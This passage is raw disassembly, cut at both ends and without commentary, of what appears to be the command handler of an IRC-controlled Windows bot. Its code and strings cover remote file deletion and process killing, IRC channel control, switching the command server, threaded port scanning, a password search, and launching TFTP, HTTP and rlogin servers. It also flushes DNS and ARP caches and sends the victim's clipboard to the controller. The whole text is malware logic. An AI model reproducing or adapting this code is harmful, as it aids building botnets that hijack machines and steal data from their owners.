push [ebp+var_8]
call dword_4220E4 ; DeleteFileA
test eax, eax
jz short loc_40D776
push [ebp+var_8]
push offset aFileDeletedS_0 ; "[FILE]: Deleted '%s'."
jmp short loc_40D781
; ---------------------------------------------------------------------------
loc_40D776: ; CODE XREF: sub_409806+3F64�j
push offset aFile_0 ; "[FILE]:"
call sub_407327
push eax
loc_40D781: ; CODE XREF: sub_409806+3F6E�j
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_416B5D
loc_40D792: ; CODE XREF: sub_409806+40A8�j
add esp, 10h
jmp loc_40B921
; ---------------------------------------------------------------------------
loc_40D79A: ; CODE XREF: sub_409806+1A93�j
; sub_409806+1AA7�j
push [ebp+var_8]
call sub_416C92
push eax
call sub_4090E5
xor esi, esi
pop ecx
inc esi
pop ecx
push [ebp+var_8]
cmp eax, esi
lea eax, [ebp+var_2F0]
jnz short loc_40D7C1
push offset aProcProcessKil ; "[PROC]: Process killed ID: %s"
jmp short loc_40D7C6
; ---------------------------------------------------------------------------
loc_40D7C1: ; CODE XREF: sub_409806+3FB2�j
push offset aProcFailedToTe ; "[PROC]: Failed to terminate process ID:"...
loc_40D7C6: ; CODE XREF: sub_409806+3FB9�j
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+var_C], 0
jnz loc_40AEF5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 14h
jmp loc_40AEF5
; ---------------------------------------------------------------------------
loc_40D7FB: ; CODE XREF: sub_409806+1A6B�j
; sub_409806+1A7F�j
push 1
xor esi, esi
push esi
push esi
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_408D07
add esp, 1Ch
cmp eax, 1
jnz short loc_40D834
push [ebp+var_8]
push offset aProcProcessK_0 ; "[PROC]: Process killed & deleted: %s"
loc_40D825: ; CODE XREF: sub_409806+2F47�j
lea eax, [ebp+var_2F0]
loc_40D82B: ; CODE XREF: sub_409806+3299�j
; sub_409806+4067�j ...
push eax
call sub_416905
add esp, 0Ch
loc_40D834: ; CODE XREF: sub_409806+2F5C�j
; sub_409806+323D�j ...
cmp [ebp+var_C], esi
jnz loc_40AEF2
push esi
jmp loc_40AED7
; ---------------------------------------------------------------------------
loc_40D843: ; CODE XREF: sub_409806+1A43�j
; sub_409806+1A57�j
xor esi, esi
push esi
push esi
push esi
push [ebp+var_8]
push [ebp+var_4]
push esi
push [ebp+arg_4]
call sub_408D07
add esp, 1Ch
push [ebp+var_8]
cmp eax, 1
lea eax, [ebp+var_2F0]
jnz short loc_40D86F
push offset aProcProcessK_1 ; "[PROC]: Process killed: %s"
jmp short loc_40D82B
; ---------------------------------------------------------------------------
loc_40D86F: ; CODE XREF: sub_409806+4060�j
push offset aProcFailedTo_0 ; "[PROC]: Failed to terminate process: %s"...
jmp short loc_40D82B
; ---------------------------------------------------------------------------
loc_40D876: ; CODE XREF: sub_409806+1A1B�j
; sub_409806+1A2F�j
mov esi, [ebp+var_8]
push esi
call dword_43A414 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40D8B3
push 2
push 4
lea eax, [ebp+arg_0]
push eax
call dword_43A494 ; gethostbyaddr
test eax, eax
jz short loc_40D8CE
push dword ptr [eax]
loc_40D89C: ; CODE XREF: sub_409806+40C6�j
push esi
lea eax, [ebp+var_2F0]
push offset aDnsLookupSS_ ; "[DNS]: Lookup: %s -> %s."
push eax
call sub_416905
jmp loc_40D792
; ---------------------------------------------------------------------------
loc_40D8B3: ; CODE XREF: sub_409806+4080�j
push esi
call dword_43A400 ; gethostbyname
test eax, eax
jz short loc_40D8CE
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_43A420 ; inet_ntoa
push eax
jmp short loc_40D89C
; ---------------------------------------------------------------------------
loc_40D8CE: ; CODE XREF: sub_409806+4092�j
; sub_409806+40B6�j
push offset aDnsCouldnTReso ; "[DNS]: Couldn't resolve hostname."
jmp loc_40B913
; ---------------------------------------------------------------------------
loc_40D8D8: ; CODE XREF: sub_409806+19F3�j
; sub_409806+1A07�j
push 7Fh
push [ebp+var_8]
push [ebp+arg_14]
call sub_4169C0
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainServerChan ; "[MAIN]: Server changed to: '%s'."
push eax
call sub_416905
add esp, 18h
jmp loc_40EDEE
; ---------------------------------------------------------------------------
loc_40D901: ; CODE XREF: sub_409806+19CB�j
; sub_409806+19DF�j
push 5
xor esi, esi
push esi
push esi
push [ebp+var_8]
push offset aOpen ; "open"
push esi
call dword_43A4AC ; ShellExecuteA
push [ebp+var_8]
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40D92D
push offset aShellFileOpene ; "[SHELL]: File opened: %s"
jmp loc_40D82B
; ---------------------------------------------------------------------------
loc_40D92D: ; CODE XREF: sub_409806+411B�j
push offset aShellCouldnTOp ; "[SHELL]: Couldn't open file: %s"
jmp loc_40D82B
; ---------------------------------------------------------------------------
loc_40D937: ; CODE XREF: sub_409806+19A3�j
; sub_409806+19B7�j
mov eax, [ebp+var_8]
mov cl, [eax]
mov byte_42FCD4, cl
movsx eax, byte ptr [eax]
push eax
push offset aMainPrefixChan ; "[MAIN]: Prefix changed to: '%c'."
jmp loc_40EDDF
; ---------------------------------------------------------------------------
loc_40D950: ; CODE XREF: sub_409806+197B�j
; sub_409806+198F�j
push [ebp+var_8]
call sub_416C92
test eax, eax
pop ecx
jle loc_40F8C3
push [ebp+var_8]
call sub_416C92
cmp eax, 1F4h
pop ecx
jge loc_40F8C3
push 0
push 0
lea eax, [ebp+var_C8]
push 2
push eax
call sub_411098
push eax
lea eax, [ebp+var_2F0]
push offset aNickS ; "NICK %s"
push eax
call sub_416905
add esp, 1Ch
jmp loc_40CE04
; ---------------------------------------------------------------------------
loc_40D9A1: ; CODE XREF: sub_409806+1953�j
; sub_409806+1967�j
mov edi, [ebp+var_8]
push edi
call sub_416C92
test eax, eax
pop ecx
jle loc_409A84
push edi
call sub_416C92
mov esi, 1F4h
cmp eax, esi
pop ecx
jge loc_409A84
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_416C92
imul eax, 234h
pop ecx
push dword_43B24C[eax]
call sub_405CD5
pop ecx
pop ecx
push esi
call dword_422000 ; Sleep
push edi
call sub_416C92
imul eax, 234h
pop ecx
push dword_43B24C[eax]
call dword_43A4B0 ; closesocket
push [ebp+var_18]
push edi
call sub_416C92
imul eax, 234h
pop ecx
push dword_43B254[eax]
call dword_4220F0 ; TerminateThread
push edi
call sub_416C92
imul eax, 234h
and dword_43B254[eax], 0
push edi
call sub_416C92
imul eax, 234h
and byte ptr dword_43B040[eax], 0
pop ecx
pop ecx
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_40DA4F: ; CODE XREF: sub_409806+192B�j
; sub_409806+193F�j
mov edi, [ebp+var_8]
push 4
mov esi, offset aAll ; "all"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40DA8C
call sub_413827
test eax, eax
jle short loc_40DA74
push eax
push offset aThreadsStopped ; "[THREADS]: Stopped: %d thread(s)."
jmp loc_40EEA2
; ---------------------------------------------------------------------------
loc_40DA74: ; CODE XREF: sub_409806+4261�j
push offset aThreadsNoActiv ; "[THREADS]: No active threads found."
loc_40DA79: ; CODE XREF: sub_409806+4C7B�j
; sub_409806+4C9A�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_416905
pop ecx
pop ecx
jmp loc_40D18A
; ---------------------------------------------------------------------------
loc_40DA8C: ; CODE XREF: sub_409806+4258�j
mov edi, [ebp+var_20]
jmp short loc_40DAFE
; ---------------------------------------------------------------------------
loc_40DA91: ; CODE XREF: sub_409806+42FC�j
mov esi, [ebp+edi*4+var_A4]
test esi, esi
jz loc_409A84
push esi
call sub_416C92
push eax
call sub_41379F
pop ecx
pop ecx
test eax, eax
push esi
lea eax, [ebp+var_2F0]
jz short loc_40DAC0
push offset aThreadsKilledT ; "[THREADS]: Killed thread: %s."
jmp short loc_40DAC5
; ---------------------------------------------------------------------------
loc_40DAC0: ; CODE XREF: sub_409806+42B1�j
push offset aThreadsFailedT ; "[THREADS]: Failed to kill thread: %s."
loc_40DAC5: ; CODE XREF: sub_409806+42B8�j
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40DAF1
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 14h
loc_40DAF1: ; CODE XREF: sub_409806+42CC�j
lea eax, [ebp+var_2F0]
push eax
call sub_401ECD
pop ecx
loc_40DAFE: ; CODE XREF: sub_409806+4289�j
inc edi
cmp edi, 20h
jb short loc_40DA91
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_40DB09: ; CODE XREF: sub_409806+1903�j
; sub_409806+1917�j
cmp [ebp+var_14], 0
jz loc_40F8C3
push [ebp+var_8]
push [ebp+var_14]
call sub_4173D0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40F8C3
push esi
push offset aS_5 ; "%s\r\n"
push [ebp+arg_4]
call sub_405CD5
push esi
push offset aMainIrcRawS_ ; "[MAIN]: IRC Raw: %s."
jmp short loc_40DB96
; ---------------------------------------------------------------------------
loc_40DB40: ; CODE XREF: sub_409806+18DB�j
; sub_409806+18EF�j
push [ebp+var_8]
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_405CD5
push [ebp+var_8]
push offset aMainPartedChan ; "[MAIN]: Parted channel: '%s'."
jmp short loc_40DB96
; ---------------------------------------------------------------------------
loc_40DB5A: ; CODE XREF: sub_409806+18B3�j
; sub_409806+18C7�j
push [ebp+ebx+var_9C]
push [ebp+var_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_405CD5
push [ebp+var_8]
push offset aMainJoinedCh_0 ; "[MAIN]: Joined channel: '%s'."
jmp loc_40CEBE
; ---------------------------------------------------------------------------
loc_40DB7E: ; CODE XREF: sub_409806+188B�j
; sub_409806+189F�j
push [ebp+var_8]
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_405CD5
push [ebp+var_8]
push offset aMainNickChange ; "[MAIN]: Nick changed to: '%s'."
loc_40DB96: ; CODE XREF: sub_409806+37EC�j
; sub_409806+4338�j ...
call sub_401F41
loc_40DB9B: ; CODE XREF: sub_409806+3852�j
add esp, 14h
jmp loc_40F8C3
; ---------------------------------------------------------------------------
loc_40DBA3: ; CODE XREF: sub_409806+1851�j
; sub_409806+1865�j
mov cl, byte_42E356
and [ebp+arg_0], 0
test cl, cl
mov edx, offset byte_42E356
jz loc_409A84
mov eax, edx
loc_40DBBC: ; CODE XREF: sub_409806+43BF�j
inc [ebp+arg_0]
add eax, 0Bh
cmp byte ptr [eax], 0
jnz short loc_40DBBC
test cl, cl
jz loc_409A84
mov [ebp+var_1C], edx
loc_40DBD2: ; CODE XREF: sub_409806+46A3�j
push 9
call sub_4138A6
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 258h
jle short loc_40DC22
push ecx
lea eax, [ebp+var_2F0]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_416905
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 20h
jmp loc_40DE9F
; ---------------------------------------------------------------------------
loc_40DC22: ; CODE XREF: sub_409806+43E6�j
or [ebp+var_4D8], 0FFFFFFFFh
xor esi, esi
cmp dword_42E068, esi
mov [ebp+var_4DC], 0C8h
mov [ebp+var_4F0], 5
mov [ebp+var_4EC], esi
mov [ebp+arg_0], esi
jz short loc_40DCB5
mov edx, [ebp+var_1C]
add edx, 0FFFFFFF6h
mov edi, offset dword_42E068
loc_40DC5B: ; CODE XREF: sub_409806+4491�j
mov esi, edx
lea eax, [edi-28h]
loc_40DC60: ; CODE XREF: sub_409806+4476�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_40DC84
test cl, cl
jz short loc_40DC7E
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_40DC84
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40DC60
loc_40DC7E: ; CODE XREF: sub_409806+4464�j
xor esi, esi
xor eax, eax
jmp short loc_40DC8B
; ---------------------------------------------------------------------------
loc_40DC84: ; CODE XREF: sub_409806+4460�j
; sub_409806+446E�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
xor esi, esi
loc_40DC8B: ; CODE XREF: sub_409806+447C�j
cmp eax, esi
jz short loc_40DC9B
inc [ebp+arg_0]
add edi, 3Ch
cmp [edi], esi
jnz short loc_40DC5B
jmp short loc_40DCB5
; ---------------------------------------------------------------------------
loc_40DC9B: ; CODE XREF: sub_409806+4487�j
mov eax, [ebp+arg_0]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_42E068[ecx]
mov [ebp+var_4F4], ecx
mov [ebp+var_4D8], eax
loc_40DCB5: ; CODE XREF: sub_409806+4448�j
; sub_409806+4493�j
cmp [ebp+var_4F4], esi
jz loc_40DEC6
push 10h
pop esi
lea eax, [ebp+var_BC]
push eax
lea eax, [ebp+var_D8]
push eax
push [ebp+arg_4]
mov [ebp+var_BC], esi
call dword_43A308 ; getsockname
mov al, [ebp+var_38F]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_D4], eax
push [ebp+var_D4]
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+var_608]
push eax
call sub_4169C0
xor eax, eax
cmp [ebp+var_38F], al
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_608]
push eax
call sub_416960
add esp, 14h
xor bl, bl
test esi, esi
jle short loc_40DD5B
loc_40DD3B: ; CODE XREF: sub_409806+4553�j
test eax, eax
jz short loc_40DD5B
mov byte ptr [eax], 78h
lea eax, [ebp+var_608]
push 30h
push eax
call sub_416960
pop ecx
inc bl
pop ecx
movsx ecx, bl
cmp ecx, esi
jl short loc_40DD3B
loc_40DD5B: ; CODE XREF: sub_409806+4533�j
; sub_409806+4537�j
mov eax, [ebp+arg_4]
push [ebp+var_9C]
mov [ebp+var_4F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_4D0], eax
mov eax, [ebp+var_C]
mov [ebp+var_4CC], eax
mov ebx, 80h
lea eax, [ebp+var_5F8]
push ebx
push eax
mov [ebp+var_4C8], 1
call sub_416B5D
xor ecx, ecx
add esp, 0Ch
mov eax, offset aMurders ; "#murders"
inc ecx
mov edi, 422B0Ah
mov esi, eax
xor edx, edx
repe cmpsb
jz short loc_40DDC3
push eax
lea eax, [ebp+var_578]
push ebx
push eax
call sub_416B5D
add esp, 0Ch
jmp short loc_40DDCA
; ---------------------------------------------------------------------------
loc_40DDC3: ; CODE XREF: sub_409806+45A8�j
and [ebp+var_578], 0
loc_40DDCA: ; CODE XREF: sub_409806+45BB�j
xor esi, esi
cmp [ebp+var_4C8], esi
mov eax, offset aRandom ; "Random"
jnz short loc_40DDDE
mov eax, offset aSequential ; "Sequential"
loc_40DDDE: ; CODE XREF: sub_409806+45D1�j
push [ebp+var_4DC]
lea ecx, [ebp+var_608]
push [ebp+var_4EC]
push [ebp+var_4F0]
push [ebp+var_4F4]
push ecx
push eax
lea eax, [ebp+var_2F0]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_416905
push esi
lea eax, [ebp+var_2F0]
push 9
push eax
call sub_4136B6
add esp, 2Ch
mov [ebp+var_4E8], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_608]
push eax
push offset sub_401B65
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_4E8]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40DEBC
call dword_422004 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
push eax
call sub_416905
add esp, 0Ch
loc_40DE71: ; CODE XREF: sub_409806+46BE�j
cmp [ebp+var_C], esi
jnz short loc_40DE92
push esi
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 14h
loc_40DE92: ; CODE XREF: sub_409806+466E�j
lea eax, [ebp+var_2F0]
push eax
call sub_401ECD
pop ecx
loc_40DE9F: ; CODE XREF: sub_409806+4417�j
add [ebp+var_1C], 0Bh
mov eax, [ebp+var_1C]
cmp byte ptr [eax], 0
jnz loc_40DBD2
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_40DEB4: ; CODE XREF: sub_409806+46BC�j
push 32h
call dword_422000 ; Sleep
loc_40DEBC: ; CODE XREF: sub_409806+464E�j
cmp [ebp+var_4C4], esi
jz short loc_40DEB4
jmp short loc_40DE71
; ---------------------------------------------------------------------------
loc_40DEC6: ; CODE XREF: sub_409806+44B5�j
lea eax, [ebp+var_2F0]
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, port is i"...
push eax
call sub_416905
pop ecx
pop ecx
jmp loc_40F1E6
; ---------------------------------------------------------------------------
loc_40DEDE: ; CODE XREF: sub_409806+1829�j
; sub_409806+183D�j
push [ebp+var_9C]
lea eax, [ebp+var_B4]
push 80h
push eax
call sub_416B5D
mov eax, [ebp+arg_4]
mov [ebp+var_B8], eax
mov eax, [ebp+var_4]
mov [ebp+var_30], eax
mov eax, [ebp+var_C]
push offset aFindpassSearch ; "[FINDPASS]: Searching for password."
mov [ebp+var_2C], eax
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_416B5D
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 1Eh
push eax
call sub_4136B6
add esp, 24h
mov [ebp+var_34], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_B8]
push eax
push offset sub_403DEF
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_34]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40DF7C
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aFindpassFail_0 ; "[FINDPASS]: Failed to start search thre"...
jmp loc_40C9D8
; ---------------------------------------------------------------------------
loc_40DF74: ; CODE XREF: sub_409806+4779�j
push 32h
call dword_422000 ; Sleep
loc_40DF7C: ; CODE XREF: sub_409806+475B�j
cmp [ebp+var_28], esi
jz short loc_40DF74
jmp loc_40EE11
; ---------------------------------------------------------------------------
loc_40DF86: ; CODE XREF: sub_409806+1801�j
; sub_409806+1815�j
push 5
call sub_4138A6
test eax, eax
pop ecx
jle short loc_40DFAA
lea eax, [ebp+var_2F0]
push offset aTftpAlreadyRun ; "[TFTP]: Already running."
push eax
call sub_416905
xor edi, edi
jmp loc_40F5CA
; ---------------------------------------------------------------------------
loc_40DFAA: ; CODE XREF: sub_409806+478A�j
mov eax, [ebp+ebx+var_A0]
xor edi, edi
cmp eax, edi
mov esi, 104h
jz short loc_40DFCF
push eax
lea eax, [ebp+var_1444]
push esi
push eax
call sub_416B5D
add esp, 0Ch
jmp short loc_40DFDE
; ---------------------------------------------------------------------------
loc_40DFCF: ; CODE XREF: sub_409806+47B4�j
push esi
lea eax, [ebp+var_1444]
push eax
push edi
call dword_42200C ; GetModuleFileNameA
loc_40DFDE: ; CODE XREF: sub_409806+47C7�j
mov ebx, [ebp+ebx+var_9C]
cmp ebx, edi
jnz short loc_40DFEE
mov ebx, offset byte_42FD48
loc_40DFEE: ; CODE XREF: sub_409806+47E1�j
push ebx
lea eax, [ebp+var_1340]
push esi
push eax
call sub_416B5D
mov eax, dword_42FCBC
mov [ebp+var_1234], eax
mov eax, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_1448], eax
lea eax, [ebp+var_1230]
push eax
mov [ebp+var_1238], edi
call sub_4169C0
mov eax, [ebp+var_4]
mov [ebp+var_11B0], eax
mov eax, [ebp+var_C]
mov [ebp+var_11AC], eax
lea eax, [ebp+var_1340]
push eax
lea eax, [ebp+var_1444]
push eax
push [ebp+var_1234]
lea eax, [ebp+var_2F0]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_416905
push edi
lea eax, [ebp+var_2F0]
push 5
push eax
call sub_4136B6
add esp, 38h
mov [ebp+var_123C], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_1448]
push eax
push offset sub_4131EE
push edi
push edi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_123C]
imul ecx, 234h
cmp eax, edi
mov dword_43B254[ecx], eax
jnz short loc_40E0D0
call dword_422004 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aTftpFailedTo_0 ; "[TFTP]: Failed to start server thread, "...
push eax
call sub_416905
add esp, 0Ch
jmp loc_40F5CC
; ---------------------------------------------------------------------------
loc_40E0C8: ; CODE XREF: sub_409806+48D0�j
push 32h
call dword_422000 ; Sleep
loc_40E0D0: ; CODE XREF: sub_409806+48A0�j
cmp [ebp+var_11A8], edi
jz short loc_40E0C8
jmp loc_40F5CC
; ---------------------------------------------------------------------------
loc_40E0DD: ; CODE XREF: sub_409806+17D9�j
; sub_409806+17ED�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40E0FC
push esi
call sub_416C92
test eax, eax
pop ecx
jz short loc_40E0FC
push esi
call sub_416C92
pop ecx
jmp short loc_40E101
; ---------------------------------------------------------------------------
loc_40E0FC: ; CODE XREF: sub_409806+48E0�j
; sub_409806+48EB�j
mov eax, dword_42FCC0
loc_40E101: ; CODE XREF: sub_409806+48F4�j
mov ebx, [ebp+ebx+var_9C]
mov [ebp+var_AFC], eax
xor eax, eax
cmp [ebp+var_38C], al
setz al
xor edi, edi
cmp ebx, edi
mov [ebp+var_AE8], eax
jz short loc_40E136
lea eax, [ebp+var_C00]
push ebx
push eax
call sub_416905
pop ecx
pop ecx
jmp short loc_40E161
; ---------------------------------------------------------------------------
loc_40E136: ; CODE XREF: sub_409806+491D�j
push 104h
lea eax, [ebp+var_84C]
push eax
call dword_422048 ; GetSystemDirectoryA
push edi
push edi
push edi
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_84C]
push eax
call sub_41802F
add esp, 14h
loc_40E161: ; CODE XREF: sub_409806+492E�j
lea eax, [ebp+var_C00]
lea edx, [eax+1]
loc_40E16A: ; CODE XREF: sub_409806+4969�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40E16A
sub eax, edx
cmp [ebp+eax+var_C01], 5Ch
jnz short loc_40E196
lea eax, [ebp+var_C00]
lea edx, [eax+1]
loc_40E186: ; CODE XREF: sub_409806+4985�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40E186
sub eax, edx
and [ebp+eax+var_C01], cl
loc_40E196: ; CODE XREF: sub_409806+4975�j
push [ebp+var_9C]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_E88]
push 80h
push eax
mov [ebp+var_E8C], esi
call sub_416B5D
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_AEC], eax
lea eax, [ebp+var_C00]
push eax
push [ebp+var_AFC]
mov [ebp+var_AF0], ebx
push esi
call sub_408852
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_416905
push edi
lea eax, [ebp+var_2F0]
push 4
push eax
call sub_4136B6
add esp, 20h
mov [ebp+var_AF4], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_E8C]
push eax
push offset sub_405549
push edi
push edi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_AF4]
imul ecx, 234h
cmp eax, edi
mov dword_43B254[ecx], eax
jnz short loc_40E251
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedT_1 ; "[HTTPD]: Failed to start server thread,"...
jmp loc_40C42A
; ---------------------------------------------------------------------------
loc_40E249: ; CODE XREF: sub_409806+4A51�j
push 32h
call dword_422000 ; Sleep
loc_40E251: ; CODE XREF: sub_409806+4A30�j
cmp [ebp+var_AE0], edi
jz short loc_40E249
jmp loc_40C439
; ---------------------------------------------------------------------------
loc_40E25E: ; CODE XREF: sub_409806+17B1�j
; sub_409806+17C5�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40E27D
push esi
call sub_416C92
test eax, eax
pop ecx
jz short loc_40E27D
push esi
call sub_416C92
pop ecx
jmp short loc_40E282
; ---------------------------------------------------------------------------
loc_40E27D: ; CODE XREF: sub_409806+4A61�j
; sub_409806+4A6C�j
mov eax, dword_42FCC4
loc_40E282: ; CODE XREF: sub_409806+4A75�j
mov [ebp+var_8F8], eax
mov eax, [ebp+ebx+var_9C]
xor edi, edi
cmp eax, edi
jnz short loc_40E29B
lea eax, [ebp+var_F0]
loc_40E29B: ; CODE XREF: sub_409806+4A8D�j
push eax
lea eax, [ebp+var_A38]
push 40h
push eax
call sub_416B5D
mov ebx, [ebp+ebx+var_98]
add esp, 0Ch
cmp ebx, edi
jnz short loc_40E2BD
mov ebx, 422B0Ah
loc_40E2BD: ; CODE XREF: sub_409806+4AB0�j
push ebx
lea eax, [ebp+var_9F8]
push 100h
push eax
call sub_416B5D
push [ebp+var_9C]
lea eax, [ebp+var_AB8]
push 80h
push eax
call sub_416B5D
mov eax, [ebp+var_C]
mov esi, [ebp+arg_4]
mov ebx, [ebp+var_4]
add esp, 18h
mov [ebp+var_8E4], eax
lea eax, [ebp+var_A38]
push eax
push [ebp+var_8F8]
mov [ebp+var_ABC], esi
push esi
mov [ebp+var_8E8], ebx
call sub_408852
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aRlogindServerL ; "[RLOGIND]: Server listening on IP: %s:%"...
push eax
call sub_416905
push edi
lea eax, [ebp+var_2F0]
push 7
push eax
call sub_4136B6
add esp, 20h
mov [ebp+var_8F4], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_ABC]
push eax
push offset sub_410B00
push edi
push edi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_8F4]
imul ecx, 234h
cmp eax, edi
mov dword_43B254[ecx], eax
jnz short loc_40E38A
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aRlogindFailedT ; "[RLOGIND]: Failed to start server threa"...
jmp loc_40C42A
; ---------------------------------------------------------------------------
loc_40E382: ; CODE XREF: sub_409806+4B8A�j
push 32h
call dword_422000 ; Sleep
loc_40E38A: ; CODE XREF: sub_409806+4B69�j
cmp [ebp+var_8E0], edi
jz short loc_40E382
jmp loc_40C439
; ---------------------------------------------------------------------------
loc_40E397: ; CODE XREF: sub_409806+1789�j
; sub_409806+179D�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40E3AA
push ebx
call sub_416C92
jmp short loc_40E3B1
; ---------------------------------------------------------------------------
loc_40E3AA: ; CODE XREF: sub_409806+4B9A�j
push 9
call sub_4138C5
loc_40E3B1: ; CODE XREF: sub_409806+4BA2�j
test eax, eax
pop ecx
jz loc_40F8C3
push eax
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4010CA
jmp loc_40E8A0
; ---------------------------------------------------------------------------
loc_40E3D1: ; CODE XREF: sub_409806+1761�j
; sub_409806+1775�j
mov eax, dword_43A488
test eax, eax
jz short loc_40E3F4
call eax ; DnsFlushResolverCache
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40E3ED
push offset aFlushdnsDnsCac ; "[FLUSHDNS]: DNS cache flushed."
jmp short loc_40E415
; ---------------------------------------------------------------------------
loc_40E3ED: ; CODE XREF: sub_409806+4BDE�j
push offset aFlushdnsFailed ; "[FLUSHDNS]: Failed to flush DNS cache."
jmp short loc_40E415
; ---------------------------------------------------------------------------
loc_40E3F4: ; CODE XREF: sub_409806+4BD2�j
push offset aFlushdnsFail_0 ; "[FLUSHDNS]: Failed to load dnsapi.dll."
lea eax, [ebp+var_2F0]
jmp short loc_40E415
; ---------------------------------------------------------------------------
loc_40E401: ; CODE XREF: sub_409806+1739�j
; sub_409806+174D�j
call sub_408774
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40E425
push offset aFlushdnsArpC_0 ; "[FLUSHDNS]: ARP cache flushed."
loc_40E415: ; CODE XREF: sub_409806+4BE5�j
; sub_409806+4BEC�j ...
push 200h
push eax
call sub_416B5D
jmp loc_40ED23
; ---------------------------------------------------------------------------
loc_40E425: ; CODE XREF: sub_409806+4C08�j
push offset aFlushdnsFail_1 ; "[FLUSHDNS]: Failed to flush ARP cache."
jmp short loc_40E415
; ---------------------------------------------------------------------------
loc_40E42C: ; CODE XREF: sub_409806+1711�j
; sub_409806+1725�j
cmp [ebp+var_C], 0
jnz short loc_40E44D
push 0
push [ebp+var_4]
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 14h
loc_40E44D: ; CODE XREF: sub_409806+4C2A�j
push 0
push [ebp+var_4]
call sub_4073B1
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
push offset aMainGetClipboa ; "[MAIN]: Get Clipboard."
jmp loc_40E769
; ---------------------------------------------------------------------------
loc_40E470: ; CODE XREF: sub_409806+1382�j
; sub_409806+1396�j
push 8
call sub_4138A6
test eax, eax
pop ecx
jle short loc_40E486
